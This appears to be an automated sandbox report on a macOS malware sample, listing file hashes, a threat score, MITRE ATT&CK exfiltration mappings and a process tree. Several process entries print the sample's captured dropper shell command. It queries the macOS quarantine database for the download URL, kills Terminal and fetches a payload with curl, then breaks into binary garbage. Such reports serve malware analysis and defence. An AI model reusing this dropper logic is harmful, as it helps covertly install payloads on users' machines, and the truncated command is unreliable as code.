b850cd121b76d1b1610a05fde0c7a11e3169f545617a5a5b0e7c440bd7b30944

Analysis

max time kernel
0s
max time network
105s
platform
macos-10.15_amd64
resource
macos-20241101-en
resource tags

arch:amd64arch:i386image:macos-20241101-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
17/02/2025, 18:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a
Size

34KB
MD5

e5c50dcecc0d91a37a7fdb4d05206678
SHA1

afc4e2271b2e6dc131fd9731769834d2ccacb149
SHA256

0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a
SHA512

d490555365ac53060416cbc3b64fb38eae0f6f16339c55fc2b2a1c332b672e0b45d911701c6c1d24b908fb39ea843da87e2df4e5ea8a81557bde0cc281504681
SSDEEP

384:CMCyAH1ICtuL//Hk/eUlpEf0cotU2HguYZ5tvr+Q8qr3vFrh6rHskrNab8eri:DObtm3k/HipotXAuYZfp8uv75mab8z

Score

7^/10

exfiltration

Malware Config

Signatures

Exfiltration Over Alternative Protocol 1 TTPs 1 IoCs

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

exfiltration

Exfiltration Over Unencrypted Non-C2 Protocol

T1048.003

ioc	Process
sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]\|\|[ \"\${param}\" == \"sidw\" ]\|\|[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/m��ʘ�8�]��#��>�i�PȆ��'�: Mb��Y�]��Hy��%�� `:{��I��j�\|��V�R��2�G�M�og�y�˞Cr\|��㜇��%j�}�D>��yp�A˚�j@��3+�h-�?��9\|SGIV�/Od�k�Zp��埈��u3-�Wc=��o݄in�\\��\$I��:�^FOh1�r+��}�jy}�%{4:_}� ��&:C�� gF`�ݗ�~Br[�(�d��l5��g�S]�-�^��dq��IQr@��>�*�.�E0�^�Sy��g;�\\��>��a�#R��hz?;>��ոS�󘞽��C�Ǖ�\\}\":S��dq�C �n��/�%k<� XĹ(��o��A�;�n!�&��H5KMr�'�#�s<a�(E��\"�E��l�Ա�#iu�(J�I��R��@�~�v�r��EԸ��'�Gauaz��3}��:i�<��HjG3\\��0�؜M_�GK��\\��p�"	Process not Found

ioc

Process

sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/m��ʘ�8�]��#��>�i�PȆ��'�: Mb��Y�]��Hy��%�� `:{��I��j�|��V�R��2�G�M�og�y�˞Cr|��㜇��%j�}�D>��yp�A˚�j@��3+�h-�?��9|SGIV�/Od�k�Zp��埈��u3-�Wc=��o݄in�\\��*\$I��:�^FOh1�r+��}�jy}�%{4:_}� ��&:C�� gF`�ݗ�~Br[�(�d��l5��g�S]�-�^��dq��IQr@��>�*�.�E0�^�Sy��g;�\\��>��a�#R��hz?;>��ոS�󘞽��C�Ǖ�\\}\":S��dq�C �n��/�%k<� XĹ(��o��A�;�n!�&��H5KMr�'�#�s<a�(E��\"�E��l�Ա�#iu�(J�I��R��@�~�v�r��EԸ��'�Gauaz��3}��:i�<��HjG3\\��0�؜M_�GK��\\��p�"

Process not Found

/bin/sh
sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a\""
1⤵
PID:493

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a\""
1⤵
PID:493

/usr/bin/sudo
sudo /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a
1⤵
PID:493
- /bin/zsh
  /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a
  2⤵
  PID:494
- /Users/run/Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a
  /Users/run/Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a
  2⤵
  PID:494

/bin/sh
sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/m��ʘ�8�]��#��>�i�PȆ��'�: Mb��Y�]��Hy��%�� `:{��I��j�|��V�R��2�G�M�og�y�˞Cr|��㜇��%j�}�D>��yp�A˚�j@��3+�h-�?��9|SGIV�/Od�k�Zp��埈��u3-�Wc=��o݄in�\\��*\$I��:�^FOh1�r+��}�jy}�%{4:_}� ��&:C�� gF`�ݗ�~Br[�(�d��l5��g�S]�-�^��dq��IQr@��>�*�.�E0�^�Sy��g;�\\��>��a�#R��hz?;>��ոS�󘞽��C�Ǖ�\\}\":S��dq�C �n��/�%k<� XĹ(��o��A�;�n!�&��H5KMr�'�#�s<a�(E��\"�E��l�Ա�#iu�(J�I��R��@�~�v�r��EԸ��'�Gauaz��3}��:i�<��HjG3\\��0�؜M_�GK��\\��p�"
1⤵
PID:495

/bin/bash
sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/m��ʘ�8�]��#��>�i�PȆ��'�: Mb��Y�]��Hy��%�� `:{��I��j�|��V�R��2�G�M�og�y�˞Cr|��㜇��%j�}�D>��yp�A˚�j@��3+�h-�?��9|SGIV�/Od�k�Zp��埈��u3-�Wc=��o݄in�\\��*\$I��:�^FOh1�r+��}�jy}�%{4:_}� ��&:C�� gF`�ݗ�~Br[�(�d��l5��g�S]�-�^��dq��IQr@��>�*�.�E0�^�Sy��g;�\\��>��a�#R��hz?;>��ոS�󘞽��C�Ǖ�\\}\":S��dq�C �n��/�%k<� XĹ(��o��A�;�n!�&��H5KMr�'�#�s<a�(E��\"�E��l�Ա�#iu�(J�I��R��@�~�v�r��EԸ��'�Gauaz��3}��:i�<��HjG3\\��0�؜M_�GK��\\��p�"
1⤵
PID:495

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Exfiltration Over Alternative Protocol

T1048

Exfiltration Over Unencrypted Non-C2 Protocol

T1048.003

Impact

Windows 7 deprecation

Loading Replay Monitor...